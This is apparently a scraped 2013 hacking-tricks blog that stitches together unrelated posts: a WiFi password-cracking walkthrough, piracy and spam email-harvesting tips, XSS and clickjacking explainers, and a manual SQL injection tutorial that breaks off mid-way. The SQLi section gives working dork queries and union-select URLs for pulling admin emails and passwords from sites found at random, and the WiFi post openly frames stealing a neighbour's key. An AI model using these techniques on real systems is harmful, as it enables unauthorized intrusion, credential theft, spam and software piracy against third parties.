The content in this blog just for educational purposes only.We are not responsible for anything.

Recent Post

Recent Posts

Friday, July 19, 2013

Easy Way to H@ck WiFi Password 100%



If you are living nearby someones WiFi hotspot and every time your laptop search for connection its showing up but you don't have passwords. Or you just want to steal someones WPA/WPA2 Wi-Fi hotspot key or passwords. Don't worry...

In this tutorial I’ll show How to hack a WPA/WPA2 Wi-Ficonnection through a bootable USB.
Things you should need:


1. A USB pen drive

2. beini.iso file

Code: http://www.mediafire.com/?n1vtzmzhp35vfga
3. UNetbootin software to make your USB drive bootable. [Download for Windows, Linux or Mac]
Some few steps you should to do ( WEP):

1. Write beini.iso on your USB by UNetbootin. Set everything according to this image bellow



2. After finishing restart your PC and boot it from your USB.

3. If you were successful to boot up then you should see something like this. Click Minidwep-gtk.



4. Click OK



5. Now Minipwep-gtk program will open. Click Scan.



6. Select a wireless network(should have Clint) from the list. And click Lunch to start creaking process



7. Sometimes its take a while according to your victim connections IVS value and password strength. So keep passions.



8. If it found a password, it should appear like this



To creak WPA/WPA2 follow this image instruction.


Blogger Tricks

Seagate EVault 100 GB FREE BEST CLOUD Storage With Trick

Seagate EVault 100 GB Best CLOUD Storage for free





1st of all its not valid in india 

Please note but u can use simple tricks 

First Create a new account in 
if u already have then open above link
when asking for mail give @india.com id 
2nd Give Location US
with valid zipcode of US (like-92284,91167,94532) 
then Submit.
Now U’re done. Enjoy the 100 GB Seagate cloud storage

Use multiple accounts using MultiFox in Mozilla Firefox

Hi friends,

Today i am going to tell How to use Multiple accounts Using Multifox on firedox..

If you have more than one account in google,yahoo,facebook,ultoo,laaptu,ypox and so on..

Usually you login to one account and use it ,Logout and login to another account,

If you are using Firefox, then you can use the MultiFox add-on to login into multiple accounts at the same time.

Steps:Use multiple accounts using MultiFox in Mozilla Firefox

  • Use Firefox browser (Currently Multifox available only for Firefox)
  • Multifox, it allows simultaneously logins using different user ID without the need to logoff the current one before logging in with a new user name.
  • click on the green link on the right side Install Extension

click Allow

  • Click on the install button when asked,
    • Restart Firefox to finish the installation.
After the installation of the MultiFox add-on and restarting the Firefox browser, you are ready to tweet from your Firefox browser. If you want to login into a different account of the same service(for example, google, yahoo,
ultoo,laaptu,ypox and so on..etc), then just select File → New Identitity Profile as shown,




A new Firefox window will be opened with a new profile, in which you can login to annother account of the same service. Each profile is assigned a number. This number can be seen in the location bar. Clicking on the number in the location bar shows a About box for MultiFox addon. If Firefox crashes, all the extra profiles generated by Multifox will be restored when you restore the original instance of Firefox.
  • Click the Blue box in the aderess bar


  • Finally opened all 4 Accounts in firefox using Multifox.

1 Million Serial Numbers of Different Softwares

Hi friends giving you all 
1 Million Serial Numbers of Different Softwares
download in single click


Gmail DOT Trick : Great Amazing Trick

Suppose There is a Gmail account : Example@gmail.com
having password : abcd

img 131262 gmail logo
You will get logged in to example@gmail.com If you use
email as : E.xample@gmail.com
password : abcd
email as : Ex.ample@gmail.com
password : abcd
email as : Exa.mple@gmail.com
password : abcd
email as : Exam.ple@gmail.com
password : abcd
email as : Examp.le@gmail.com
password : abcd
and so on..

That means gmail does not count periods (.). So isnt its Great ...

So you can use this trick for using the same email for various GPT, PTC, Twitter accounts as they interpret all the above emails as different but gmail considers it the same.

HOW TO GENERATE THOUSANDS OF GENUINE EMAIL IDS FOR FREE

Hi, here I am once again, with a new trick about How to generate 1000's of genuine e-mail id's with in 5 to 10 minutes , all you have to do is just follow these simple steps . its up to you that how you want to use them . So be careful about it. 



Requirements :-
Mozilla Firefox or Google Chrome browser.
Auto pager Plugin. Download it from here:- For Mozilla Firefox, For Google Chrome
A bit brain (very important)

LETS START GENERATING E-MAIL ID'S :-
Go to http://www.google.com, click on "Search settings" in the top right corner and change the number of results to display "100" per page, now click on Save preferences.
Now in the search bar type a keyword(s) and the e-mail extension in speech marks For example :- xyz"@gmail.com" What it will do is search for web-pages that contain Gmail e-mail adresses and that are also related with your keyword. The speech marks around "@gmail.com" make sure that "@gmail.com" is on every web page that is a result of the search.

You can also search single websites for e-mail adresses as shown on the example :- site:twitter.com "@gmail.com" The example shown above will search the whole of twitter.com for"@gmail.com" email adresses. 
Now With your results in focus, click the arrow at the side of the AutoPager icon as shown in the picture below. Then goto "Immediately load > All pages" .as shown in screenshot. With your search results still in focus, scroll all the way down and AutoPager should load the next page of results onto the same page you are currently on. Keep scrolling till all pages have loaded onto the samepage.



Press "ctrl + a" to select all of the pages then press "ctrl + c" to copy the results. With the results still in the clipboard (Still copied) go to http://www.skymem.com/ or Click here . Paste your results into the first box which says "1. Put text with email addresses here:" and just click on Start Extracting Emails Button on top of that box. The settings should already be correct with "unique emails" and "sortticked" So no need to Touch that option. 
The e-mail adresses should show in the Results box (3rd box) almost instantly.
Now copy the results from the results box paste them into Notepad. Sometimes the e-mail address seem to end in ".com." instead of just".com" so in notepad go to "Edit > Replace" and in the "Find what" text-box type ".com." without the speech marks("") in the "Replace with" textbox type".com" , without the speech marks.


Amulyam all in one sites

Hi friends will be updating working sites regularly for Amulyam
Bookmark this page for regular visit



2 july

more site coming....

Ypox auto earning site

Hi friends here comes the new ypox earning site created by SID.
Its working on a new server with full earnings..

Steps to follow:
First bookmark this:
Then login to ypox account
and enter captcha
and open the bookmark
After opening you will get a session id
now copy the session id
and open the site(Click to open)
now paste the session id and mobile recpt no
and click on quiz1,2,3..
Now full earnings in few minutes

Thursday, July 18, 2013

IBPS:Institute of Banking Personnel Selection – PO/Mgt Trainee-III CWE 2013 Complete Details:

Institute of Banking Personnel Selection – PO/Mgt Trainee-III CWE 2013 Complete Details: Institute of Banking Personnel Selection (IBPS) is conducting Common Written Examination (CWE PO/MT-III) for the recruitment of Probationary Officer/ Management Trainee vacancies in Public Sector Banks which will be conducted online. Aspirants can apply online from 22-07-2013 to 12-08-2013. More details regarding educational qualifications, age limit, selection and application process are mentioned below…

Participating Banks
Allahabad Bank Union Bank ofIndia
Central Bank ofIndia Bank ofIndia
Indian Bank ECGC
Syndicate Bank Punjab National Bank
Andhra Bank United Bank ofIndia
Corporation Bank Bank ofMaharashtra
Indian Overseas Bank IDBI Bank
UCO Bank Punjab & Sind Bank
Bank ofBaroda Vijaya Bank
Dena Bank Canara Bank
Oriental Bank of Commerce Any other bank or financial institution
IBPS Vacancy Details:
Name of the Post: Probationary Officer/ Management Trainee
Age Limit: Candidates age limit is 20 years to 28 years as on 01-07-2013. Relaxation is applicable as per the rules.
Educational Qualification: Candidates must possess Degree with 60% marks in any discipline from a recognized University or any equivalent qualification recognized as such by the Central Government.
 
Selection Process: Candidates will be selected based on Common Written Exam and Common Interview. Candidates who are Shortlisted in the Examination (CWE) will be called for a Common Interview to be conducted by Participating Organizations and coordinated by IBPS.
Application Fee: Candidates must pay application fee/ intimation charges of Rs.100/- for SC/ ST/ PWD candidates and Rs.600/- for all others through online or offline mode.
Online Mode: After submission of online application form, candidates can make payment through payment gateway using Internet Banking/ Master/ Visa Debit or Credit Cards from 22-07-2013 to 12-08-2013. After online payment, take print of system generated e-receipt for future use.
Offline Mode: Candidates can deposit the fee (offline) by using system generated fee payment challan at CBS branches of any of 7 Public Sector Banks mentioned in the notification from 24-07-2013 to 17-08-2013. Fee payment Challan can be downloaded after submission of online application form.
How to Apply: Interested candidates can apply online through IBPS official website www.ibps.in by filling all the mandatory details from 22-07-2013 to 12-08-2013. After submission of online application form, candidates are required to take print out of it for future use. System generated printout of the online application form, original and self attested photocopies of all relevant documents must be produced at the time of interview.

nstructions to Apply Online:
1. Log on to www.ibps.in
2. Select the link “CWE PO/MT-III” and then click on the option “Click here to Apply Online for CWE-Probationary Officers/ Management Trainees (CWE PO/MT-III)” to open Online Application.
3. Fill all the mandatory details, upload scanned copy of photograph and signature.
4. Submit error free online application.
5. Make payment as mentioned above and update payment details by revisiting the website.
6. Take print out of system generated e-receipt (if online payment made) and online Application Form for future use.
Important Dates:
Starting Date for Online Registration: 22-07-2013
Closing Date for Online Registration: 12-08-2013
Online Payment of Application Fees: 22-07-2013 to 12-08-2013
Offline Payment of Application Fees: 24-07-2013 to 17-08-2013
Download of Call Letter for Pre-Examination Training (PET) for SC/ ST/ Minority Community candidates: After 25-09-2013
Pre-Examination Training: 07-10-2013 to 12-10-2013
Download of Call letter for Examination: After 07-10-2013
Online Examination (Tentative dates) – Some/ All/ Additional Dates as the need arises: 19-10-2013/ 20-10-2013/ 26-10-2013/ 27-10-2013
Declaration of Result Status of Examination (CWE): Third/ Fourth Week of November 2013
Download of Call Letters for Interview: First Week of January 2014
Conduct of Interview: Third Week of January 2014
Allotment: March 2014
For more details regarding age, qualifications, pay scale, selections and other information click on the below links…
BPS – PO/MT CWE – III (2013) More Information 
 PO/MT CWE-III Notification Click here 
 PO/MT CWE-III Eligibility Click here 
PO/MT CWE-III Selection Process Click here 

Wednesday, July 10, 2013

Self-XSS (Cross Site Scripting) ~ Social Engineering Attack and Prevention

Self-XSS (Cross Site Scripting) ~ Social Engineering Attack and Prevention



Last time , I have explained about the Clickjacking attack and prevention.  Today,  i am going to explain about the Self-XSS(Cross Site Scripting) Attack


What is Self-XSS?
Self-XSS is one of the popular Social Engineering Attack used by Attackers to trick users into paste the malicious code in browser.  Results in attacker accessing to the whatever website you visit. Usually scammers use this attack for tricking users to buy products or get money through online survey .

Recently, Hackers Attacked Facebook with explicit hardcore porn images. Facebook says it might be self-Xss Attack .

Javascript can be executed in browser url bar.
For example , enter the following code in your browser:
This will show a pop up box with "kotharavichandra".  An attacker can use this for malicious purpose. He can steal Confidential data, cookies, redirect to malware sites and more.
For Eg:
Entering the following code will display the cookies in your browser:

The above code is not going to anything maliciously other than displaying the cookies.  But an attacker can extend the script so that it can take advantage your data.

Security Tips from kotharavichandra:
  • Use NoScript add on that will prevent javascript running in your browser.
  • Don't click the shorthand urls for Example: bit.ly/55ewEb?22.  This may redirect to an infected sites. 
Aware of Social Engineering:
  • If anyone ask you(even if he is your friend) to paste the scripts in browser bar, Never do this mistake.  
  • If anyone says "Iphone only $10", Don't eager to click it. 
  • If anyone says "1000 shares will cure a baby", Never do this mistake. Facebook shares never help to get money or help to cure baby.
  • Read our EHN spam report to know the latest updates about the facebook scams.
God give us the Sixth Sense,Use it and think before you click any links or following the other instructions.

What is Clickjacking Attack? How to Prevent? | UI Redressing

What is Clickjacking Attack? How to Prevent? | UI Redressing



Will answering simple maths quiz delete your Social Network account?  If your answer is "No", then check this news Linkedin Clickjacking Vulnerability and come back.  Will visiting a website turn on your webcam? The answer is "Yes".  Check this Flash player clickjacking vulnerability.

If you read above news completely, It will be easy for you to understand  what is clickjacking.  Ok, lets continue to our Article.

Clickjacking also known as UI Redressing,is one of Malicious Technique tricking users to click the button/image that will run hidden malicious script from another site.
An attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the innocuous page. Thus an attacker hijack the click to another website.  That's why it is known as Clickjacking(Click+Hijacking).  The term "clickjacking" was coined by Jeremiah Grossman and Robert Hansen in 2008.

Example:
Lets take the real time example "Linkedin clickjacking vulnerability.
The above image may look like simple maths problem.  Once you click the submit button, it will delete your Linkedin account(if you are logged in) without asking any questions.

Clickjacking Attack can be used for:
  • Tricking users to turn on their webcam and microphone using this adobe vulnerability (this security flaw fixed by adobe)
  • Getting more Twitter Followers
  • Post in your facebook wall.
  • Can delete your profile.

Prevention Techniques:

Client Side(Security tips for users):
Flash Player:
Update your Flash Player(old version are vulnerable to Clickjacking). 

Browser Security Addons: 
Noscript:
Noscript is Mozilla add on that provides protection against clickjacking,XSS and other malicious scripts.  Noscript is available for mobiles also.

Comitari Web Protection Suite: Comitari provides client side protection against ClickJacking (aka UI Redressing) attacks. Installed as browser add-on

GuardedID: It is a commercial product which provides client-side clickjack protection for users of IE or Firefox without interfering with the operation of legitimate iFrames

Server Side( For Developers)
Frame Killer:
Framekiller is javascript snippet that can be used in webpage  to avoid inserting frames from different sources.  This can provide security against frame based clikjacking.

Bypassing the XSS Filters : Advanced XSS Tutorials for Web application Pen Testing

Hi friends, last time, i explained what is XSS and how an attacker can inject malicious script in your site. As i promised earlier, i am writing this advanced XSS tutorial for you(still more articles will come).

Sometimes, website owner use XSS filters(WAF) to protect against XSS vulnerability.
For eg: if you put the
, the Filter will escape the "(quote) character , so the script will become

Now this script won't work. Likewise Filters use different type of filtering method to give protection against the XSS.  In this case, we can use some tricks to bypass the filter.  Here i am going to cover that only.

1.Bypassing magic_quotes_gpc

The magic_quotes_gpc=ON is a PHP setting(configured in PHP.ini File) , it escapes the every ' (single-quote), " (double quote) and \  with a backslash automatically. For Eg:
will be filtered as
.so the script won't work now.

This is well known filtering method, but we can easily bypass this filter by using ASCII characters instead.
For Eg:

can be converted to

so the script will become .  In this case there is no "(quotes) or '(single quotes) or / so the filter can't filter this thing.  Yes, it will successfully run the script.
String.fromCharCode() is a javascript function that converts ASCII value to Characters.

How to convert to ASCII values?

There are some online sites that converts to ASCII character. But i suggest you to use Hackbar Mozilla addon .

After installing hackbar add on ,press F9.  It will open the small box above the url bar. click the XSS->String.fromCharCode()

Now it will popup small window. enter the code for instance alert("Hi").  click ok button.  Now we got the output.

copy the code into the inside and insert in the vulnerable sites

For eg: 


2.HEX Encoding

we can encode our whole script into HEX code so that it can't be filtered.
For example:
can be convert to HEX as:
Now put the code in the vulnerable site request.
For ex:
 Converting to HEX:
This site will convert to hex code: http://centricle.com/tools/ascii-hex/

3.Bypassing using Obfuscation

Some website admin put the script,alert in restricted word list.  so whenever you input this keywords, the filter will remove it and will give error message like "you are not allowed to search this". This can bypassed by changing the case of the keywords(namely Obfuscation). 
For eg:

This bypass technique rarely works but giving trial is worth.

4. Closing Tag

Sometimes putting "> at the beginning of the code will work.


This will end the previous opened tag and open our script tag.
Example:

Conclusion:
From above article, it is clear that XSS filters alone not going to protect a site from the XSS attacks. If you really want to make your site more secure, then ask PenTesters to test your application or test yourself.

Also there are lot of different filter bypassing technique, i just covered some useful techniques for you.

DOM Based Cross Site Scripting(XSS) vulnerability Tutorial

DOM Based Cross Site Scripting(XSS) vulnerability Tutorial

 So far i have explained about the Traditional Cross site scripting that occurs because of insecure server-side code. In this post , i am going to explain the DOM Based Cross Site Scripting vulnerability. if you don't know what is cross site scripting , then i recommend you to read the basics from here.

Before explaining about the DOM based xss, let me explain what DOM means to.

What is DOM?
DOM is expanded as Document object model that allows client-side-scripts(Eg: Javascript) to dynamically access and modify the content, structure, and style of a webpage.

Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of DOM.

Here is a very simple HTML code that accepts and writes user input using JavaScript with the help of DOM.


If you know HTML and Javscript, understanding the above code is a piece of cake.

In the above example, the javascript code gets value from the url parameter "BTSinput" and writes the value in our webpage.

For example, if the url is
The webpage will display "default" as output.


Did you notice ?! The part of the webpage is not written by Server-side script.  The client side script modifies the content dynamically based on the input.   Everything done with the help of DOM object 'document'.

DOM Based XSS vulnerability:
When a developer writes the content using DOM object without sanitizing the user input , it allow an attacker to run his own code. 

In above example, we failed to sanitize the input and simply displayed the whatever value we get from the url. 

An attacker with malicious intention can inject a xss vector instead .  For example:





As i said earlier, the document.write function simply writes the value of BTSinput parameter in the webpage.  So it will write the
in the webpage without sanitizing.  This results in running the script code and displays the alert box.


Patching the DOM Based Cross Site Scripting Vulnerability
Audit all JavaScript code in use by your application to make sure that untrusted data is being escaped before being written into the document, evaluated, or sent as part of an AJAX request. There are dozens of JavaScript functions and properties which must be protected, including some which are rather non-obvious:

The document.write() function
The document.writeln() function
The eval() function, which executes JavaScript code from a string
The execScript() function, which works similarly to eval()
The setInterval(), setTimeout(), and navigate() functions
The .innerHTML property of a DOM element
Certain CSS properties which allow URLs such as .style, .backgroundImage, .listStyleImage, etc.
The event handler properties like .onClick, which take JavaScript code as their values

Any data which is derived from data under the client's control (e.g. request parameters, headers, query parameters, cookie names and values, the URL of the request itself, etc.) should be escaped before being used. Examples of user-controlled data include document.location (and most of its properties, e.g. document.location.search), document.referrer, cookie names and values, and request header names and values.

You can use the JavaScript built-in functions encode() or encodeURI() to handle your escaping. If you write your own escaping functions, be extremely careful. Rather than using a "black list" approach (where you filter dangerous characters and pass everything else through untouched), it is better to use a "white list" approach. A good white list approach is to escape everything by default and allow only alphanumeric characters through.

Reference:
http://www.rapid7.com/vulndb/lookup/http-client-side-xss

Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability

Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability

 

What is XSS?

Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users.

In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms.

Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password.
It will be easy to understand XSS , if you have the following prerequisite:
  • Strong Knowledge in HTML,javascript(Reference).
  • Basic Knowledge in HTTP client-Server Architecure(Reference)
  • [optional]Basic Knowledge about server side programming(php,asp,jsp)

XSS Attack:
Step 1: Finding Vulnerable Website
Hackers use google dork for finding the vulnerable sites for instance  "?search=" or ".php?q=" .  1337 target specific sites instead of using google search.  If you are going to test your own site, you have to check every page in your site for the vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find a input field so that we can inject our own script, for example: search box, username,password or any other input fields.


Test 1 :
Once we found the input field, let us try to put some string inside the field, for instance let me input "BTS". It will display the  result .

Now right click on the page and select view source.   search for the string "BTS" which we entered in the input field.  Note the location where the input is placed.

Test 2:
Now we are going to check whether the server sanitize our input or not.  In order to do this , let us input the .

Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS .  By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.

Types of XSS Based on persisting capability:
Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.

Persistent XSS:

The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.

For Example:   
Many websites host a support forum where registered users can ask their doubts by posting message  , which are stored in the database.  Let us imagine , An attacker post a message containing malicious javascript code instead.  If the server fail to sanitize the input provided, it results in execution of injected script.  The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account.


Non-Persistent XSS:

Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest.  The server embedd the input with the html file and return the file(HTTPResponse) to browser.  When the browser executes the HTML file, it also execute the embedded script.  This kind of XSS vulnerability frequently occur in search fields.

Example:
Let us consider a project hosting website.  To find our favorite project, we will just input the related-word in the search box .  When searching is finished, it will display a message like this "search results for yourword " .  If the server fail to sanitize the input properly, it will results in execution of injected script.

In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser.  The browser then executes the code .

In addition to these types, there is also third  type of attack called DOM Based XSS attack, i will explain about this attack in later posts.

What can an attacker do with this Vulnerability?
  • Stealing the Identity and Confidential Data(credit card details).
  • Bypassing restriction in websites.
  • Session Hijacking(Stealing session)
  • Malware Attack
  • Website Defacement
  • Denial of Service attacks(Dos)
Disclaimer:
This article is intended for educational purpose only.

What is computer hacking? Introduction to Hacking

What is computer hacking? Introduction to Hacking 




What is computer hacking?
In a cyber security world, the person who is able to discover weakness in a system and managed to exploit it to accomplish his goal referred as a Hacker , and the process is referred as Hacking.

Now a days,  People started think that hacking is only hijacking Facebook accounts or defacing websites.  Yes, it is also part of hacking field but it doesn't mean that it is the main part of hacking.

So what is exactly hacking, what should i do to become a hacker?!  Don't worry, you will learn it from my blog. The Security. The main thing you need to become a hacker is self-interest.  You should always ready to learn something and learn to create something new.


Now , let me explain about different kind of hackers in the cyber security world.

Script Kiddie

Script Kiddies are the persons who use tools , scripts, methods and programs created by real hackers.  In a simple word, the one who doesn't know how a system works but still able to exploit it with previously available tools.

White Hat Hacker:
White Hat hackers are good guys who does the hacking for defensing.  The main aim of a Whitehat hacker is to improve the security of a system by finding security flaws and fixing it.  They work for an organization or individually to make the cyber space more secure.

Break The Security only concentrates on white-hat hacking and help you to learn the Ethical Hacking world.

Black Hat Hacker:
BlackHat hackers are bad guys , cyber criminals , who have malicious intent.  The hackers who steal money, infect systems with malware ,etc are referred as BlackHat hackers.  They use their hacking skills for illegal purposes.

GreyHat hackers:


The hackers who may work offensively or defensively, depending on the situation. Hackers who don't have malicious intentions but still like to break into third-party system for fun or just for showing the existence of vulnerability.

Hacktivists
The hackers who use their hacking skills for protesting against injustice and attack a target system and websites to bring the justice.  One of the popular hacktivists is Anonymous.

 


Manual Sql Injection Tutorial

 

Manual Sql Injection Tutorial

This is just for educational purpose only, we are not responsible for anything.

In this tutorial i will be demonstrating you how to exploit a SQL Vulnerable website, and how to dig juicy information like administrator username and password of the website. I will be showing you guys how to exploit a vulnerable site using a live example i.e a SQL Vulnerable website.



What is SQLi ?
The Structured Query Language Interface (SQLI) is the internal interface between an application and the Online Web Server.


Confused because of lots of Technical Jargons?
Ok, I will make it simple. Basically a web hosting saves all its information in a table format known as Database. So all the usernames and password for accessing the webhosting will also be saved in the very same format. So SQLI is an interface where the user sends a query and the database gives an automated reply. So we will use this method to get the information about the admin's username and password, hence we get to access the complete web server.


So Lets Start Now,


Things Required :
1.SQL Vulnerable Website (OfCourse :P)
2.Pateince
3.Brain xD !





The beauty of searching for targets is a lot easier than it sounds, the most common
method of searching is (Dorks). Dorks are an input query into a search engine (Google) which
attempt to find websites with the given texxt provided in the dork itself. So navigate to


Google and copy the following into the search box:
inurl:"products.php?prodID="
This search will return websites affiliated with Google with "products.php?prodID=" within
the URL.
You can find a wide range of dorks to use by searching the forum.
I advise you to create your own dorks, be original, but at the same time unique, think of
something to use that not many people would have already searched and tested.
An example of a dork I would make up:
inurl:"/shop/index.php?item_id=" & ".co.uk"
So using your own dorks isn't a bad thing at all, sometimes your dorks wont work, nevermind
even I get it..


Testing Targets for Vulnerabilities
It's important that this part's done well. I'll explain this as simply as I can.
After opening a URL found in one of your dork results on Google you now need to test the


site if it's vulnerable to SQL injection.


Example:
http://www.site.com/index.php?Client_id=23


To test, just simply add an asterik ' at the end of the URL


Example:
http://www.site.com/index.php?Client_id=23'


How to tell if the sites vulnerable:
- Missing text, images, spaces or scripts from the original page.
- Any kind of typical SQL error (fetch_array) etc.


So if the website you're testing produces any of the above then the site is unfortunately


vulnerable, which is where the fun starts.


Finding Columns & the Vulnerable Columns
As I noted in the first section of the tutorial I advise you do pretty much everything
manually with SQL injection, so by using the following commands (providing they're followed
correctly) you will begin to see results in no time 


Example:
http://www.site.com/index.php?Client_id=23'
^^^^^^^^^^^^^^^^^^^^^^^^
IF THE SITE IS VULNERABLE
Refer to the following to checking how many columns there are.
(order+by) the order by function tells the database to order columns by an integer (digit
e.g. 1 or 2), no errors returned means the column is there, if there's an error returned the
column isnt there


wxw.site.com/index.php?Client_id=23+order+by+1 < No Error
wxw.site.com/index.php?Client_id=23+order+by+2 < No Error
wxw.site.com/index.php?Client_id=23+order+by+3 < No Error
wxw.site.com/index.php?Client_id=23+order+by+4 < ERROR


From using order+by+ command and incremating the number each time until the page
displays an error is the easiest method to find vulnerable columns, so from the examples
above when attempting to order the columns by 4 there's an error, and so column 4 doesn't
exist, so there's 3 columns.


Finding Vulnerable Columns
Ok so let's say we were working on the site I used above, which has 3 columns. We now need
to find out which of those three coluns are vulnerable. Vulnerable columns allow us to
submit commands and queries to the SQL database through the URL. (union+select)
Selects all columns provided in the URL and returns the value of the vulnerable column e.g.


2. Example:
wxw.site.com/index.php?Client_id=23+union+select+1,2,3
The site should refresh, not with an error but with some content missing and a number is
displayed on the page, either 1, 2 or 3 (as we selected the three columns in the above URL
to test for column vulnerability).
Sometimes the page will return and look completely normal, which isn't a problem. Some sites
you are required to null the value you're injecting into.
In simpler terms, the =23 you see in the above URL after Client_id must be nulled in order
to return with the vulnerable column. So we simply put a hyphen (minus sign) before the 23
like so: -23


So the URL should now look something like this:


www.site.com/index.php?Client_id=-23+union+select+1,2,3


Now that should work, let's say the page refreshes and displays a 2 on the page, thus 2
being the vulnerable column for us to inject into. 


Obtaining the SQL Verison
Easier said than done, using the information found in the above sections e.g. amount of
columns and the vulnerable column. We now use a command (@@version) and in some cases
a series of commands to determine what the SQL version is on the current site. Version 4 or
version 5. See the example below to view what a URL should look like when the version
command has been inserted into the URL replacing the number 2 as 2 is the vulnerable column
in the example site.


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,@@version,3


What you need to look for is a series of numbers e.g:
5.0.89-community
4.0.45-log


If the above failes and the site just returns an error or displays normally then we need to
use the convert function in order for the server to understand the command, don't worry
though this is usually the only thing you need to convert and it's on a rare occasion where
this is the case.


So, if the example site returned an error we need to replace @@version with the convert()


function:
convert(@@version using latin1)


So the example site will now look like this:
wxw.site.com/index.php?Client_id=-23+union+select+1,convert(@@version using latin1),3


Now if the page still decides to not return the error then the query must be hexxed:
unhex(hex(@@version))


So the example site will now look like this:
wxw.site.com/index.php?Client_id=-23+union+select+1,unhex(hex(@@version)),3


Depending on which version the SQL server it is, whether it be 4, or 5 the queries for
obtaining data from both versions are different, version 4 and 5 tables are explained below


 Version 4
- 1. Obtaining Tables and Columns


You will notice that obtaining tables and columns from version 4 MySQL servers is a little
more time consuming and confusing at times as we have to guess pretty much everyhing.
Because version 5 is more up to date and has information_schema which the database and
tables are stored in, MySQL version 4 doesn't.
Providing the MySQL version of the website is 4, we must do the following.


So, back to the example URL:
wxw.site.com/index.php?Client_id=23+union+select+1,@@version,3


We must now go back to the original URL which is:
wxw.site.com/index.php?Client_id=23+union+select+1,2,3


This is where the guessing begins, we need to guess table names.
How can we tell if the table name I guess exists?
The same as where we tested for the amount of columns.
If no error is produced then the table guessed exists.
Is there is an error then the table guessed doesn't exist, so just try another.
So we use the (from) command followed by the table name you are looking to see
exists.


Example:
wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from admin


Usual tables most people search for consist of obtaining user data, so again, be creative
just like with the dorks, common table names I use:


tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins


So if we tried the following as an example:


wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from admin
^^^
Error


wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from user
^^^
Error


wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from users
^^^^^
No Error


Now which table do you think exists..?
The table users exists


We are now required to guess column names from the existing table. So thinking logically,
which labelled columns within this table would represent data? Columns such as:
first_name, last_name, email, username, password, pass, user_id
^^^^^^^^^^^^^^^^^^^^^^^^^
Typical columns found in the users table.


So we now must think back to which column is vulnerable (in this case 2) and so we'll use
the URL and replace 2 with the column name you are attempting to see if exists in the users


table. Let's try a few of the typicals listed above:
wxw.site.com/index.php?Client_id=23+union+select+1,f_name,3 from users
^^^^
Error


wxw.site.com/index.php?Client_id=23+union+select+1,l_name,3 from users
^^^
Error


wxw.site.com/index.php?Client_id=23+union+select+1,address1,3 from users
^^^
Error


wxw.site.com/index.php?Client_id=23+union+select+1,email,3 from users
^^^^^
No Error


From the above we can clearly see that the column email exists within the table users, the
page should return displaying data (most probably an email address) or the data you are
extracting i.e if you pulled password from users and the column exists the first password
within that column will be displayed on screen.




2. Commands
From here we will be able to use certain commands to determine the amount of data we pull
from the database or which exact record you wish to pull from a column.
concat()
We will now use the concat() function to extract data from multiple columns if only one
column is vulnerable, in this case remembering back the vulnerable column is 2, so we can
only query in within this space.


Command: concat(columnname1,0x3a,columnname2)
0x3a is the hex value of a semi-colon : so the output data from the query will be displayed


like:this


Example:
wxw.site.com/index.php?Client_id=23+union+select+1,concat(email,0x3a,password),3 from users


The above will output the first email and password found in the table.


group_concat():


We will now use the group_concat() function to group all data from one column and display
them on one page. Same as the above concat() command just grouping all records together and displaying them as one.


Example:
wxw.site.com/index.php?Client_id=23+union+select+1,group_concat(email,0x3a,pass),3 from


users
Now the above should return ALL e-mails and passwords listed in the email and passwords
column within the users table.


limit 0,1
The limit command is somewhat useful if you're looking for a specific data record. Say for
instance we wanted to obtain the 250th record for emails in the table users. We would use:
limit 250,1 Thus displaying the 250th e-mail within the data.


Example:
wxw.site.com/index.php?Client_id=23+union+select+1,email,3+from+users+limit+250,1


Version 5
- 1. Obtaining Table Names


Now after that painstaking version 4 malakey lol, we're onto version 5, the easiest and
quickest version of MySQL to hack, so many things are already done for you, so realise the
possibilities and be imaginative.
Obtaining table names for version 5 MySQL servers is simple, using information_schema.tables


< For table extraction


So, example of the URL from earlier, but imagine it is now version 5


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,table_name,3+from+information_schema.tables


The above URL will display only the first table name which is listed in the database


information_schema. So using group_concat()
just like in version 4 works with the same principle.


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(table_name),3 from information_schema.tables


We should now be able to see all the tables listed on one page, sometimes the last tables
will be cut off the end because a portion of the page will be covered in table names from
information_schema which aren't useful for us so really, I usually prefer to display table
names from the primary database rather than information_schema, we can do the following by


using the +where+table_schema=database() command:
where => A query for selection
table_schema => Schema of tables from a database
database() => In context the primary database, just leave it as it is.


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()


Example List of tables:
About, Admin, Affiliates, Access, Customer, Users


Now all tables should be displayed from the primary database, take your pick and get ready
to extract columns.




2. Obtaining Column Names from Table Names


Ok, suggesting from the above we decided to obtain column information from the table Admin.
Using information_schema once again but this time we will be using:
